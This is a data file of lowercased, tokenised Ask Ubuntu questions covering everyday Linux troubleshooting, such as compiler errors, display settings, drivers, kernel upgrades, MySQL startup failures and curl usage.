490266	unable to compile program using -m32 and gcc	i have installed multi2sim on my 64-bit ubuntu machine . both gcc 4.8 and 4.8.1 is installed in my system . even after setting and exporting the ld_library_path and ld_include_path , and installing the gcc-multilib , i am facing the following error on compiling with multi2sim : $ sudo gcc -m32 test-argc.c /usr/bin/ld : skipping incompatible/usr/lib/gcc/x86_64-linux-gnu/4.8/libgcc.a when searching for -lgcc < br > /usr/bin/ld : can not find -lgcc < br > /usr/bin/ld : skipping incompatible /usr/lib/gcc/x86_64-linux-gnu/4.8/libgcc_s.so when searching for -lgcc_s < br > /usr/bin/ld : can not find -lgcc_s < br > collect2 : error : ld returned 1 exit status i am unable to figure what is wrong . please help
490267	thunderbird ctrl+n for new message not working anymore	after subscribing to news accounts , ctrl+n says something about a next new message instead of opening a new email . i could restore the functionality by removing the whole news account but is there a way to keep it ?
490273	ubuntu 14.04 : reset xrandr config	i did a wrong setting with xrandr ( wrong use of -- scale parameter ) and now my ubuntu 14.04 freeze after unity login screen i tried to remove ( from recovery shell ) ~/.config/monitors.xml and set `` xrandr -- output vga1 -- mode 800x600 '' on ~/xprofile but i ca n't reset this config . how can i restore/put default my display settings ? many thanks
490275	problems installing touch controller - ubuntu 14.04 lts	for the last week i 've been trying to get a touch controller to work on ubuntu 14.04 . i think i know what the problem is but i have no idea on how to solve it . i 've got a touch controller : touchpack 1bfd:3050 ( hid touch hid touch panel ) when doing a default installation the touch controller only registers 'left mouse button click ' . xinput test 14 shows me 'button press/button release ' . after some searching i figured out that the touch controller was recognised as a 'tablet input ' . during that search i found a command which allowed me to open the /dev/input/event2 'files ' and show me their contents and they clearly showed 'tablet interface ' or something along those lines . ( sadly i forgot the command to do so ) . using in the local.rc : modprobe -r usbhid modprobe quirks=0x1bfd:0x3050:0x40 it did register touch input but it was way off and needs calibrating . using xinput_calibrate it gave me a snippet which i was to put in 10-evdev.conf under the 'touch input ' part . no matter what i put in there it does n't help 1 bit . someone told me to put matchusbid `` 1bfd:3050 '' into the 10-evdev.conf also but that did n't do anything either ( or i did it wrong ) . the touch is responding but calibration is not having any effect , help would be greatly appreciated . thanks in advace .
490277	how to touch ubuntu for htc 3devo	i have htc 3d evo with android version 4.0.3 , i would like to install the ubuntu os in the same phone , requesting to provide detailed information for installing the ubuntu . also request you to provide the unloading of the boot loader , rooting , relative information if any . looking for affirmative replies many thanks santosh tandle
490282	problems installing bumblebee	ok , first i 'd just like to say that i know very little about how ubuntu works and i am a complete idiot . however i 've been trying my hardest to get bumblebee to work for about 6 hours now and i just feel like i 'm going around and around in circles . my technique has been to read a lot of other guides / forum posts and follow them in the vague hope that they 'll help me , however i feel like i 've just done more damage to my laptop than anything . i 'm now a little unsure of what i 've done because i understand very little of how the command line works in ubuntu and i 've just been blindly following any advice . posting here is a last resort . i 'm at my wits end and did n't want to post before this because i really am a complete newbie when it comes to linux / ubuntu . anyway , i 'm trying to install bumblebee on my laptop , something i think i 've done successfully , however it wont work for some reason . i try to run : sudo optirun firefox and i get back the error : [ 499.185096 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) nvidia ( gpu-0 ) : failed to initialize the nvidia gpu at pci:1:0:0 . please [ 499.185130 ] [ error ] aborting because fallback start is disabled . this has led me to this post . i 've followed the details and changed my /etc/bumblebee/xorg.conf.nvidia file but to no avail . i 've kept searching and found this site , i do n't have a lenovo laptop but decided to try it anyway . no dice . worse , i now get a horrible no entry sign at the top of my gui stating error : brokencount > 0 i 've tried removing all necessary software and reinstalling it , but i 'm not even sure if i did that right . i 've tried a youtube video and multiple forum posts but i just feel like i 've made things worse rather than better . can anybody helpppppp ! ? apologies for making this post , i really just do n't know what the heck i 'm doing anymore . : ( some possible useful details : running ubuntu 12.04 lspci | grep nvidia01:00.0 3d controller : nvidia corporation gk208m [ geforce gt 740m ( rev a1 ) speak to me like a 5 year old and assume i know nothing ( which is true ! )
490283	play a video at first boot	i have created my own distro . i want to play a welcome video after the installation completes and the computer restarts . can i do that in remastersys by editing the configuration files . i have no experience in coding . thanks
490284	novnc error unrecognized service on ubuntu 12.04	i am trying to do the setup for openstack . i installed novnc but when i try the command `` service novnc restart '' i get the error `` novnc : unrecognized service '' . what should i do ?
490289	how do i run kde widgets in xfce ?	i like xfce in general , but i also like kde' s widgets . how do i combine the two on ubuntu 14.04 ?
490290	cpu high usage ubuntu 14.04 when no program running	i will much appreciate any help . i have : freshly installed ubuntu 14.04 ( 3.13.0-13-generic ) , sis-648fx motherboard , pentium 4 cpu 2,80 ghz , 1,5 gb ram , & radeon 9200 se vga . the trouble is that compiz and xorg are using high cpu percentage even though all windows are closed and no application is running . i searched to find a fix but it made me more confused then before . my questions are : 1 ) is this a bug ? 2 ) is there a solution to this problem ? or 3 ) do i have to wait for a patch or new ubuntu version ? many thanks
490292	dell fans not working	i have installed ubuntu 14.04 on my dell inspiron 15r . since i have installed it , my fan is constantly spinning , even i do absolutely nothing . i found this post and i decided to install i8kutils . just after i installed it , my fans are now not spinning at all ! ! this is very dangerous for my laptop ... if i run i8kfan -1 2 my fan is spinning for 1-2 seconds in full power , and then stops again . what i should do ? i also tried the following that exist in this answer : put enabled=1 in /etc/default/i8kmon put set config ( auto ) 1 in /etc/i8kmon.conf update : please also find the output of this command $ /usr/bin/i8kmon -- verbose here ps1 : i should mention that my laptops fans work flawlesly when using windows . ps2 : i also know that there are numerous similar questions out there . i spent many hours studying them and i could n't find any good answer . therefore , i am seeking for a good answer , than closing down my question as duplicate .
490294	tmp is not ready or present error when installing ubuntu	when i try to install ubuntu 32bit i keep getting the same thing it says there is a serious error and that the tmp is not ready or present . i 'm totally lost and confused . what is going on ?
490295	get a black screen after grub ubuntu 12.04 32 bit	i have a sony vaio vpcca15fg laptop . i was trying to install amd catalyst manager on ubuntu because i was getting major overheating issues on ubuntu as it was turning on both my graphic cards to the max ( amd radeon 6630m and intel hd 4000 ) . i do n't think the catalyst manager installed correctly on my machine as now am getting a black screen after grub . i am new to ubuntu and i do n't know how to resolve this problem . any help would be greatly appreciated .
490296	ssh authentication failure in ubuntu 14.04	i 'm running 14.04 via vmware in my mac , i create an rsa.pub key and now i want to pass the key in my mac /known_hosts file . so i try it with : cat ~/.ssh/id_rsa.pub | ssh root @ newserver `` cat > > ~/.ssh/authorized_keys '' and after the confirmation `` are you sure you want to continue connecting '' in password prompt , everytime i 'm get the message that its not the correct password . but that is not true ( i changed the root password before , so i 'm 100 % sure that it 's the right one ) . any ideas ? ps : this is happening only in 14.04 . it 's not so important to run 14.04 ( i do it only for testing purposes ) but it will be glad to know why is that .
490297	adding nodes to maas without internet connection	i 've been trying to install and deploy nodes on my maas controller , but unfortunately i do n't dispose of an internet connection , because i 'm working on a pki zone . all i get is that the nodes get stuck on the repository update , the installation fails and node shutdown itself . after that in the main page of the maas admin web gui i can see that some tests are in failed state on nodes ( 3/6 ) . there 's a workaround to ignore remote repository and install the os without internet connection ?
490300	every time i connect to the internet zenity says `` downloading wine-unity3d-installer ''	every time i connect to the internet zenity flashes that little popup for about a second ( because the download is apparently 1 mb ) a couple of times . first of all , why does it keep installing the same installer over and over and over ? and secondly , is there any way to make it stop stealing the focus every time it comes up ? or better yet stop this downloading business . ( by stealing focus i mean that every time this popup occurs it switches the focus to it and makes it the top window , even if i 'm in a game , it 'll tab out and show the window . very annoying ) any help would be appreciated !
490303	ext4 going wild	all of my main hard drive barracuda 7200.12 sata 6gb/s 250gb st3250312as ( 2 years old ) going wild . it has started from 28 june 2014 . partitions sda1 ( root ) , sda5 ( home ) , sda7 ( var ) caught this from time to time on random files . sometimes it is my home partition , when i download something via browser . sometimes it is /var , where my .rrd bases : [ 82845.340334 ] ata1.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x0 [ 82845.340346 ] ata1.00 : irq_stat 0x40000001 [ 82845.340347 ] ata1.00 : failed command : read dma [ 82845.340351 ] ata1.00 : cmd c8/00:40:3e:29:0f/00:00:00:00:00/ec tag 0 dma 32768 in [ 82845.340351 ] res 51/40:00:3e:29:0f/00:00:0c:00:00/0c emask 0x9 ( media error ) [ 82845.340352 ] ata1.00 : status : { drdy err } [ 82845.340353 ] ata1.00 : error : { unc } [ 82845.417764 ] ata1.00 : configured for udma/133 [ 82845.417775 ] sd 0:0:0:0 : [ sda ] unhandled sense code [ 82845.417777 ] sd 0:0:0:0 : [ sda ] [ 82845.417778 ] result : hostbyte=did_ok driverbyte=driver_sense [ 82845.417779 ] sd 0:0:0:0 : [ sda ] [ 82845.417780 ] sense key : medium error [ current ] [ descriptor ] [ 82845.417782 ] descriptor sense data with sense descriptors ( in hex ) : [ 82845.417783 ] 72 03 11 04 00 00 00 0c 00 0a 80 00 00 00 00 00 [ 82845.417789 ] 0c 0f 29 3e [ 82845.417791 ] sd 0:0:0:0 : [ sda ] [ 82845.417792 ] add . sense : unrecovered read error - auto reallocate failed [ 82845.417793 ] sd 0:0:0:0 : [ sda ] cdb : [ 82845.417794 ] read ( 10 ) : 28 00 0c 0f 29 3e 00 00 40 00 [ 82845.417799 ] end_request : i/o error , dev sda , sector 202320190 [ 82845.417809 ] ata1 : eh complete [ 82848.253943 ] ata1.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x0 [ 82848.253946 ] ata1.00 : irq_stat 0x40000001 [ 82848.253955 ] ata1.00 : failed command : read dma [ 82848.253958 ] ata1.00 : cmd c8/00:08:3e:29:0f/00:00:00:00:00/ec tag 0 dma 4096 in [ 82848.253958 ] res 51/40:00:3e:29:0f/00:00:0c:00:00/0c emask 0x9 ( media error ) [ 82848.253960 ] ata1.00 : status : { drdy err } [ 82848.253961 ] ata1.00 : error : { unc } [ 82848.264595 ] ata1.00 : configured for udma/133 [ 82848.264610 ] sd 0:0:0:0 : [ sda ] unhandled sense code [ 82848.264611 ] sd 0:0:0:0 : [ sda ] [ 82848.264612 ] result : hostbyte=did_ok driverbyte=driver_sense [ 82848.264614 ] sd 0:0:0:0 : [ sda ] [ 82848.264615 ] sense key : medium error [ current ] [ descriptor ] [ 82848.264617 ] descriptor sense data with sense descriptors ( in hex ) : [ 82848.264618 ] 72 03 11 04 00 00 00 0c 00 0a 80 00 00 00 00 00 [ 82848.264623 ] 0c 0f 29 3e [ 82848.264626 ] sd 0:0:0:0 : [ sda ] [ 82848.264627 ] add . sense : unrecovered read error - auto reallocate failed [ 82848.264628 ] sd 0:0:0:0 : [ sda ] cdb : [ 82848.264629 ] read ( 10 ) : 28 00 0c 0f 29 3e 00 00 08 00 [ 82848.264634 ] end_request : i/o error , dev sda , sector 202320190 [ 82848.264648 ] ata1 : eh complete i 've completed the backup . i 'm not afraid . i 'm on the latest ubuntu and on the latest kernel . linux ubuntu 3.13.0-30-lowlatency # 54-ubuntu smp preempt mon jun 9 23:14:29 utc 2014 x86_64 x86_64 x86_64 gnu/linux google found for me many similar questions and perfect answers on many different forums . i 'm trying to figure , is it hardware failure or it is this patch ( 30 hours ago ) to the linux kernel . any suggestions ? edit1 : i 've found perfect toools : # sdparm -- page=rw -- long -- long -- long /dev/sda /dev/sda : ata st3250312as direct access device specific parameters : wp=0 dpofua=0 read write error recovery [ rw ] mode page [ ps=0 ] : awre 1 [ cha : n , def : 1 ] automatic write reallocation enabled arre 0 [ cha : n , def : 0 ] automatic read reallocation enabled tb 0 [ cha : n , def : 0 ] transfer block rc 0 [ cha : n , def : 0 ] read continuous 0 : error recovery may cause delays 1 : transfer data without waiting for error recovery eer 0 [ cha : n , def : 0 ] enable early recovery 1 : increase chance of mis-detection or mis-correction of error per 0 [ cha : n , def : 0 ] post error 0 : do not post recovered errors 1 : report recovered errors ( via sense key : recovered error ) dte 0 [ cha : n , def : 0 ] data terminate on error 1 : terminate data transfer when recovered error detected dcr 0 [ cha : n , def : 0 ] disable correction rrc 0 [ cha : n , def : 0 ] read retry count cor_s 0 [ cha : n , def : 0 ] correction span ( obsolete ) hoc 0 [ cha : n , def : 0 ] head offset count ( obsolete ) dsoc 0 [ cha : n , def : 0 ] data strobe offset count ( obsolete ) lbpere 0 [ cha : n , def : 0 ] logical block provisioning error reporting enabled wrc 0 [ cha : n , def : 0 ] write retry count rtl 0 [ cha : n , def : 0 ] recovery time limit ( ms ) 0 : default , -1 : 65.5 seconds edit2 : smartctl -a /dev/sda - > pastebin.com/vsfebaaq edit3 : why i 'm hope that this is not a hw , but ext4 : because , read this thread bbs.archlinux.org/viewtopic.php ? id=151341 ted ts'o , the same person who commit previous patch , around 2012-10-24 .
490305	how to remove a defective wine application that refuses to uninstall ?	i attempted to install a windows application ( daemonlite ) via wine . halfway through , a message came up that because of some `` serious problem '' it was not possible to install the program . yet the program showed up in the wine uninstaller . when i tried to unistall the program from the wine uninstaller , i got the message that it was not possible to uninstall the program ! i then uninstalled wine altogether and re-installed it . even then the defective program ( together with the others that are working fine ) showed up and refused to uninstall . so i am now stuck with a faulty program that neither works nor uninstalls . can anyone suggest a way out of the mess ?
490306	excel query in qt	i have a program to connect with excel file . my excel file contains usernames and passwords of users who has access permission to application . in interface of the program i have two qlineedit ( one for username and another for password ) and a button for log in.when i create a query and set bellow code to it , my application does n't work correctly . qsqlquery *qry = new qsqlquery ; qry- > prepare ( `` select name , password from [ `` + qstring ( `` sheet1 '' ) + `` $ ] where [ name ] = `` +myusername+ '' and [ password ] = `` +mypassword+ '' '' ) ; qry- > exec ( ) ; can every one help me ?
490311	~/.inputrc is missed in ubuntu 14.04 = > can not create a key binding	i want to add this key binding in the suitable conf file : control-t : `` top -ss \c-m '' which means : bind ctrl+t keys to top -ss command line . i enter on terminal sudo ls ~/.inputrc to check existence of this conf file . i get this error : no such file or directory where can i put this binding . what is the target file with the new fs hierarchy of ubuntu14.04 .
490314	i only have 1 dimension for my display , but not the good one	at display settings i only have 1 resolution : 1280x720 ( 16:9 ) . i use dual boot with windows and there i have plenty of resolutions . i need a rare resolution 1280x680 . my question is , could anyone give the exact lines i have to type in my terminal to get the good resolution ? and if not , what should i do ? it could be iâm a bit wrong with the resolution i need but i 'm sure it is not a normal one . iâve already searched a lot for answers but i 'm just a beginner with using the terminal .
490317	how can i find out what ibus-daemon and ibus-ui-gtk3 are doing ?	occasionally my desktop slows down a lot . the mouse pointer moves slowly or not at all , my fan starts whirring , and the end is generally nigh . if i 'm very patient normality usually restores itself , but this happens daily . recently when it happened i switched to a tty ( ctrl-alt-f1 ) and ran top . it revealed that the processes ibus-daemon and ibus-ui-gtk3 were using 99 % and 100 % of the cpu respectively . maths notwithstanding , how can i find out what these processes are doing at the time ?
490318	error while upgrading kernel	i am trying to upgrade the kernel : ( synaptic:22238 ) : glib-critical ** : g_child_watch_add_full : assertion 'pid > 0 ' failed väljer tidigare ej valt paket linux-image-3.13.0-30-lowlatency . ( läser databasen ... 331247 filer och kataloger installerade . ) preparing to unpack ... /linux-image-3.13.0-30-lowlatency_3.13.0-30.54_amd64.deb ... done . unpacking linux-image-3.13.0-30-lowlatency ( 3.13.0-30.54 ) ... ställer in linux-image-3.13.0-30-lowlatency ( 3.13.0-30.54 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.13.0-30-lowlatency /boot/vmlinuz-3.13.0-30-lowlatency run-parts : executing /etc/kernel/postinst.d/dkms 3.13.0-30-lowlatency /boot/vmlinuz-3.13.0-30-lowlatency run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.13.0-30-lowlatency/boot/vmlinuz-3.13.0-30-lowlatency update-initramfs : generating /boot/initrd.img-3.13.0-30-lowlatency gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.13.0-30-lowlatency with 1. run-parts : /etc/kernel/postinst.d/initramfs-tools exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.13.0-30-lowlatency.postinst line 1025. dpkg : error processing package linux-image-3.13.0-30-lowlatency ( -- configure ) : underprocessen installerade post-installation-skript gav felkod 2 fel uppstod vid hantering : linux-image-3.13.0-30-lowlatency e : sub-process /usr/bin/dpkg returned an error code ( 1 ) ett paket misslyckades att installeras . försöker återhämta : ställer in linux-image-3.13.0-30-lowlatency ( 3.13.0-30.54 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) the link /initrd.img is a dangling linkto /boot/initrd.img-3.13.0-30-lowlatency vmlinuz ( /boot/vmlinuz-3.13.0-30-lowlatency ) points to /boot/vmlinuz-3.13.0-30-lowlatency ( /boot/vmlinuz-3.13.0-30-lowlatency ) -- doing nothing at /var/lib/dpkg/info/linux-image-3.13.0-30-lowlatency.postinst line 491 . examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.13.0-30-lowlatency /boot/vmlinuz-3.13.0-30-lowlatency run-parts : executing /etc/kernel/postinst.d/dkms 3.13.0-30-lowlatency /boot/vmlinuz-3.13.0-30-lowlatency run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.13.0-30-lowlatency /boot/vmlinuz-3.13.0-30-lowlatency update-initramfs : generating /boot/initrd.img-3.13.0-30-lowlatency gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.13.0-30-lowlatency with 1. run-parts : /etc/kernel/postinst.d/initramfs-tools exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.13.0-30-lowlatency.postinst line 1025. dpkg : error processing package linux-image-3.13.0-30-lowlatency ( -- configure ) : underprocessen installerade post-installation-skript gav felkod 2 fel uppstod vid hantering : linux-image-3.13.0-30-lowlatency output from df : /dev/sda6 62862260 10919472 48742840 19 % / none 4 0 4 0 % /sys/fs/cgroup udev 4050264 4 4050260 1 % /dev tmpfs 812972 1544 811428 1 % /run none 5120 0 5120 0 % /run/lock none 4064860 0 4064860 0 % /run/shm none 102400 16 102384 1 % /run/user /dev/sda5 115891 80626 29070 74 % /boot /dev/sda7 824152568 142718332 639562980 19 % /home did the kernel size increased much between 3.13.0-24 and 3.13.0-27 . i got trouble when trying to install the automatic upgrade . i have two kernels installed : linux-image-3.13.0.24-generic linux-image-3.13-0-24-lowlatency
490322	mysql failed to start	i tried to restore a db backup to a newly created database , suddenly its starts showing error . ca n't connect to local mysql server through socket /var/run/mysqld/mysqld.sock so i checked /var/log/syslog which shows error like : kernel : [ 50646755.461546 ] init : mysql main process ( 31830 ) terminated with status 1 kernel : [ 50646755.461590 ] init : mysql main process ended , respawning kernel : [ 50646756.363273 ] init : mysql post-start process ( 31831 ) terminated with status 1 kernel : [ 50646756.380883 ] type=1400 audit ( 1404213477.915:91 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/sbin/mysqld '' pid=31854 comm= '' apparmor_parser '' then i tried cd /etc/apparmor.d/ sudo ln -s /etc/apparmor.d/usr.sbin.mysqld /etc/apparmor.d/disable/ sudo apparmor_parser -r /etc/apparmor.d/usr.sbin.mysqld to disable mysqld from apparmor . cat /sys/kernel/security/apparmor/profiles /usr/sbin/tcpdump ( enforce ) /usr/lib/connman/scripts/dhclient-script ( enforce ) /usr/lib/networkmanager/nm-dhcp-client.action ( enforce ) /sbin/dhclient ( enforce ) mysql removed from apparmor then i again tried to start mysql which shows error . tailf /var/log/syslog kernel : [ 50647375.532797 ] init : mysql main process ( 32120 ) terminated with status 1 kernel : [ 50647375.532843 ] init : mysql main process ended , respawning kernel : [ 50647376.405541 ] init : mysql post-start process ( 32121 ) terminated with status 1 init : mysql main process ( 32148 ) terminated with status 1 kernel : [ 50647376.611944 ] init : mysql main process ended , respawning kernel : [ 50647377.490963 ] init : mysql post-start process ( 32149 ) terminated with status 1 kernel : [ 50647377.671609 ] init : mysql main process ( 32176 ) terminated with status 1 kernel : [ 50647377.671654 ] init : mysql respawning too fast , stopped please help me , i need use same exciting database . i do n't want lose it .
490325	dnscrypt on ubuntu 14.04	how can i use dnscrypt on ubuntu 14.04 ? guides on the web do n't seem to work . i do n't even know how to post this properly . wow .
490328	virsh snapshot-create-as gives `` unable to execute qemu command `transaction` ''	i have an ubuntu 12.04 server that hosts several virtual machines . i want to make backups of these vm 's using the snapshot mechanism . the purpose of these snapshots is to have a backup on an external device . i am currently trying to simply create the backup in /var/tmp . when i type sudo virsh snapshot-create-as test-vm -- memspec /var/tmp/test-vm-snapshot i get the message error : internal error : unable to execute qemu command 'transaction ' : could not open '/var/lib/libvirt/images/test-vm.img ' : permission denied i tried to solve this by temporarily giving read/write permissions ( chmod og+rw ) but then i get the same message . i read that this is due to apparmor , and this seems to be confirmed by the syslog . however , if i temporarily stop apparmor , i still get the same error message , and the same entries in the syslog . how can i create an internal backup of a vm to a specific file ?
490329	saving multiple files with curl	i have this list of urls in a .txt file -which i 'm suppose to get content of them . to achieve this , i decided to use curl . with xargs curl < url-list.txt , i can display all the content of the url within my terminal . with curl -o myfile.html www.example.com , i can save only 1 file . there is also curl -o url1 -o url2 approach but it will be too long for me to do it . how can i save multiple files at once ? edit : # ! /bin/bash file= '' filename '' while read line do curl -o `` $ line.html '' `` $ line '' done < `` $ file '' i run the bash screen above and here is what happened :
490332	how to make start up script for making application run on startup	i have one jar which i need to run on startup and no matter whatever user is logged in and that need to take that user name automatcally here this code can take user name echo $ ( logname ) and this command i need to run on start up . java -jar /home/ ( username ) /visdashboard2014/visdashboard.jar so now how can i take dynamically username in to this command . ?
490333	asus x 200 ca ( i3 3rd generation ) notebook giving problems with ubuntu 14.04	i bought a new asus x 200 ca , ( not touch screen ) that comes with free dos . i installed ubuntu 14.04 . even as i was installing i ran into problem as many times where ever there is a need to key in name/password or anything automatic typing starts happening with letter d getting type endlessly . after i somehow installed it , now while opening the computer i am again facing the problem , in password window typing starts on its own same happens while using the browser or when i tried using word document when i call asus they told me that machine does not support ubuntu , though online information says ubuntu has used this model . my question is is it possible that machine does not work on ubuntu since it comes with free dos and one assumes that that is to give options to user to install os of their preference . please guide me . i am not a technical person but have been using ubuntu since last 3 years and whenever i had any challenges i have been able to use online help and work . i am still talking to the company and hopefully they will get back with a solution . i thought i will get more knowledge writing here . in peace agyatmitra
490334	how to successfully restart a usb modem without reboot	@ jorge-castro continuing from `` how to successfully restart a network without reboot ? '' hello jorge castro thank you for your detailed response on the topic [ how-to-successfully-restart-a-network-without-reboot ] . the discussion there seems to come closest to addressing my problem . ( i 'm beginning a new question because i do n't have enough reputation points to continue the earlier discussion with a `` comment '' ) problem : although my situation is a little different , i would like to ask if you can help . rather than a wired or a wireless network going down , i am using a usb modem ( zte - mblaze ) in india . each time it disconnects , the only way that i can get it to reconnect ( at least 80 % of the time ) is a complete restart . solutions tried : i tried both the suggestions in this strand , and in the link which you provided . `` sudo service network-manager restart '' as well as `` sudo ifdown -a '' / `` sudo ifup -a '' neither worked - only a complete restart will allow use of the modem other possibilities : i can try a `` reboot without actually shutting down '' and/or `` kexec '' but it seems that for both of these i would have to close all applications . they will only reduce the time , but not eliminate the inconvenience of a reboot . question : can you suggest other terminal commands that could help ? thank you ! bryan btw - system : toshiba nb200 intel atom cpu n280 @ 1.66ghz x 2 graphics - unknown , os 32-bit , disk 16.8 gb ubuntu 12.04 lts
490337	ubuntu grub issue	having a hard time with the grub , i pretty much tried everything , i also run the boot-repair and this is what i got back , can anyone please help me sort this out , our server is down and it 's not looking good . thanks http : //paste.ubuntu.com/7731107/ update : i managed to solve that error but now it 's saying no os is found http : //paste.ubuntu.com/7731251/ update : now i receive missing operating system when i boot .
490346	bluetooth not working in ubuntu 14.04 lts	since when i got rid of windows 8 and installed ubuntu , my bluetooth never really worked . ubuntu detects the bluetooth hardware ( it shows the bluetooth icon in the status bar ) , and i can turn it on or off and set the visibility and such . however , it is never able to find any bluetooth device , and when i try to connect to my laptop from an other device , it usully does n't find my computer . if it does find my computer , it will show it using the name it had in windows ( i do n't know if it 's supposed to do that or not ) , and connecting to he laptop gives a communication error . i do n't know exactely what 's causing the problem , but i know that the bluetooth settings on windows 8 were quite glitched , which caused bluetooth to be always on untill you interrupted a device search , after which it was off untill the next reboot . because of this , i think that maybe the glitched windows drivers messed something up that ubuntu does n't repair . i did try ubuntu in a virtual machine in windows a few times before fully installing ubuntu , and bluetooth worked fine then . this laptop has been fully tested in the factory yesterday after an overheating gpu was fixed , and they claim that all hardware behaved as it should . so i do n't think it 's a hardware issue . does anyone know what could be causing the problem , and how to fix it ?
490348	ca n't see any of the partitioned drive when installing ubuntu 14.04	i am trying to install ubuntu 14.04 to a partition on my laptop , and i ca n't seem to see any of the partitioned drive . what might be the problem ?
490349	libjansson repositories ?	i 'm trying to get the deb repository for libjansson4 which includes version 2.6-1 , but when i go to this page here https : //launchpad.net/ubuntu/utopic/amd64/libjansson-dev/2.6-1 i ca n't get the ppa repository so i can add it to my repositories to download it to my system . i currently have and old outdated version of libjansson4 on 2.4 , and i need 2.5 or greater to try compile this software that depends on it . i did however come to another page which has the libjansson4 > =2.6-1 and it 's amd64 build , but when i go to run that deb package i get error saying it has unmet dependencies because it requires libjansson4 to be > =2.5 and up . selecting previously unselected package libjansson-dev : amd64 . ( reading database ... 303860 files and directories currently installed . ) unpacking libjansson-dev : amd64 ( from ... /libjansson-dev_2.6-1_amd64.deb ) ... dpkg : dependency problems prevent configuration of libjansson-dev : amd64 : libjansson-dev : amd64 depends on libjansson4 ( = 2.6-1 ) ; however : version of libjansson4 : amd64 on system is 2.4-1. dpkg : error processing libjansson-dev : amd64 ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : libjansson-dev : amd64 checking around and i ca n't seem to get a hold of the debian repositories so i can add them , just where are they and why is it so difficult to get a hold of ? it 's really annoying that the current repositories are so outdated , yet on the actual main sources where they can be obtained they have them constantly updated as they release them , more so annoying they do n't provide any instructions on how to add their ppa because they did n't say what their ppa repo is like most people put out . i have considered the option of just taking rpm package and then re-compile that into a deb package , although that just takes too much time and effort to do .
490350	how to invoke cvlc so that closing the video window ends the process ?	i am trying to write a script to run a video using cvlc ( command below ) . however , when i close the video , i can hear the sound still playing in the background , and i need to run killall vlc to stop it . ( the same thing happens if i choose `` quit '' from the vlc icon in the launcher . ) how can i invoke cvlc so that closing the video window ends the process ? nohup cvlc -- video-title `` minivid '' $ 1 > /dev/null 2 > & 1 & if nohup is the problem , i need another option so that i can invoke myscript video.webm without generating any output on the commandline .
490352	ubuntu software updates not happening properly ?	my software updater in ubuntu 14.04 was working perfectly . one day , i killed power to the system , when an update was in progress . from then on , when i boot my system , it displays that software updates are available and asks me if i want to go ahead with downloading them . when i press ok , to start the download , a window pops up saying.. failed to download package files , check your internet connection . but i know that my internet connection is working perfectly , ( otherwise i would n't be able to post this question ! ) . please help .
490356	thunderbolt display on macbook pro retina 11,1 ( 13 '' ) w ubuntu 14.04	i 've just successfully installed ubuntu 14.04 ( linux 3.13.0-30 ) on my macbook pro retina ( 11,1 ) ( this model has only an intel gpu ) ; following this https : //help.ubuntu.com/community/macbookpro11-1/saucy if i plug the external thunderbolt display after the system is loaded , nothing happens ; if i plug it before the boot , it was activated but the startup process requires up to 20 mins . also , after 5-10 minutes of usage , the system starts to run very slow 'til it completely stucks . what i can do about this ? many thanks in advance
490357	is there any way to add a new keyboard shortcut ?	folks . is there any way to add a new keyboard shortcut on lubuntu 14.04 ? i would like to add alt+64 shortcut for making `` @ '' . best regards .
490363	unable to ping ubuntu machine after vmware workstation installation	i need some advise , i am new in ubuntu or linux . i have a dell r201 machine with ubuntu 14.04 server that i was able to connect to it via rdp with no problem . after installing vmware workstation , i am unable to ping it or access it in any way . from the ubuntu machine there are no ping to the gw or to any other machines inside the lan , but it is connected to the internet and it can ping ok to any site like www.cnn.com or google.com . can someone please advise ? thank you !
490365	trouble dual loading 14.04 and windows 7 64 bit	i am trying to dual boot 14.04 on my lenovo laptop with windows 7 64 bit . i have 3 active partitions in the 1tb drive , and have set aside a 30gb partition that i leave inactive before i switch to ubuntu . the installer tells me that there are no operating systems on this computer when i try to load ubuntu . so rather than erase the disk i click something else and partition the unallocated space . when i click next i get a message telling me i have to fix something in new partition ( sorry i did n't get the message copied before rebooting ) . i do not have any discs for the windows system and lenovo wants quite a lot for them since i am out of warranty . is there any way to fix this or am i not going to be able to dual boot this machine . this happens on my windows 8 ultrabook as well when i tried loading it on there .
490366	how to retain installed software between ubuntu installations / tools for software inventory ?	is there a good way to manage / keep track of the installed software on ubuntu machine ? through the years , we keep improving our system , install all kinds of useful tools to make ourselves more `` at home '' in our own system . then comes the day , when one has to get a new laptop , install new version of ubuntu , copy all files and set up the new system . and then spend days , weeks or even months installing again all the applications that were formely installed . in this process , it would be very helpful to get all the former applications carried over . what are the best ways to accomplish this ? surely apt maintains db of all installed packages , but how does one get all these packages easily re-installed in the newly installed system ?
490368	motherboard secondary dvi no signal	i just bought a motherboard with integrated graphic ( intel ) 3 outputs : 1 x vga 1 x hdmi 1 x dvi i 've been able to use both vga & hdmi but the dvi is not detected . $ lspci 00:02.0 vga compatible controller : intel corporation xeon e3-1200 v2/3rd gen core processor graphics controller ( rev 09 ) $ xrandr vga1 connected primary 1280x1024+335+1080 ( normal [ ... ] y axis ) 338mm x 270mm 1280x1024 60.0*+ 75.0 [ ... ] hdmi1 disconnected ( normal left inverted right x axis y axis ) hdmi2 connected 1920x1080+0+0 ( normal [ ... ] y axis ) 160mm x 90mm 1920x1080 60.0*+ 50.0 59.9 30.0 25.0 24.0 30.0 24.0 [ ... ] dp1 disconnected ( normal left inverted right x axis y axis ) dp2 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis ) how can i make my dvi output to actually ouput something ?
